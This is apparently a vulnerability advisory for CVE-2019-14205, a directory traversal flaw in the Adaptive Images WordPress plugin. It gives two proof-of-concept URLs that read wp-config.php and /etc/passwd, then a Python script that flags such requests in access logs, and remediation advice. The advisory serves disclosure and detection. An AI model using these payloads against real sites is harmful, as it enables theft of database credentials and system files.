ID:2052 - Exploit for PHP file inclusion in Adaptive Images for WordPress - CVE-2019-14205


Published: March 18, 2020


Vulnerability identifier: #VU19312
Vulnerability risk: High
CVE-ID: CVE-2019-14205
CWE-ID: CWE-98
Exploitation vector: Remote access
Vulnerable software: Adaptive Images for WordPress

Link to public exploit:


Vulnerability description

The vulnerability allows a remote attacker to include arbitrary files on the system.

The vulnerability exists due to an input validation error when processing directory traversal sequences passed via the "$_REQUEST['adaptive-images-settings']['source_file']" parameter in "adaptive-images-script.php". A remote attacker can arbitrarily choose the file that the script reads and serves.

PoC:

http://[host]/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://[host]/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd
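To spot exploitation attempts for this issue in web server access logs, here is an added detection example (not part of the advisory and not code from the plugin). It assumes Apache combined log format and uses constructed sample lines; it flags any request whose `adaptive-images-settings[source_file]` value contains `..` segments or an absolute path, after decoding percent-encoding so the encoded variant in the third sample line is caught too.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic): a normal image
# request, the two PoC requests from the advisory (one percent-encoded),
# and a benign request that names a file inside the uploads directory.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Mar/2020:10:01:02 +0000] "GET /wp-content/uploads/2019/05/image.jpg HTTP/1.1" 200 5120
203.0.113.5 - - [18/Mar/2020:10:01:09 +0000] "GET /wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 200 2890
203.0.113.7 - - [18/Mar/2020:10:02:41 +0000] "GET /wp-content/uploads/2019/05/image.jpg?adaptive-images-settings%5Bsource_file%5D=%2Fetc%2Fpasswd HTTP/1.1" 200 1700
203.0.113.9 - - [18/Mar/2020:10:03:15 +0000] "GET /wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=2019/05/image.jpg HTTP/1.1" 200 5120
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# The parameter the advisory names (key as parse_qs returns it after decoding).
PARAM = "adaptive-images-settings[source_file]"

def is_traversal_target(value: str) -> bool:
    """True if the requested source_file would escape the uploads directory."""
    # Decode twice so single and double percent-encoding are both normalised;
    # treat backslashes as separators in case the host is Windows.
    decoded = unquote(unquote(value)).replace("\\", "/")
    if decoded.startswith("/"):
        return True          # absolute path such as /etc/passwd
    return any(part == ".." for part in decoded.split("/"))

def find_cve_2019_14205_attempts(log_text: str) -> list:
    """Return (client_ip, decoded source_file) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        # parse_qs percent-decodes parameter names, so an encoded
        # "%5Bsource_file%5D" key matches the plain bracketed key.
        for raw in query.get(PARAM, []):
            if is_traversal_target(raw):
                hits.append((line.split()[0], unquote(raw)))
    return hits

if __name__ == "__main__":
    for ip, target in find_cve_2019_14205_attempts(SAMPLE_LOG):
        print(f"{ip} requested {target}")
```

A WAF or log-pipeline rule built on the same check should key on the decoded parameter rather than on the literal `../` string, since the encoded form in the sample above is what the literal match misses.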
Remediation

Install updates from the vendor's website.